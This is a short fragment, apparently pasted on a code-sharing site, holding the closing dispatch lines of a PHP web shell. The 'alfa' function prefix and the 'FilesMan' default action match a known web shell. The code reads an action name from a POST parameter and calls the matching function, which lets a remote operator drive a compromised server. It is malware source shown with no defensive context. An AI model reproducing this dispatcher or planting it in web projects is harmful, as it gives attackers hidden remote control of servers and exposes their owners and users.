- if (empty($_POST['a'])) if (isset($default_action) && function_exists('alfa' . $default_action)) $_POST['a'] = $default_action;
- else $_POST['a'] = 'FilesMan';
- if (!empty($_POST['a']) && function_exists('alfa' . $_POST['a'])) call_user_func('alfa' . $_POST['a']);
- exit; ?>
Add Comment
Please, Sign In to add comment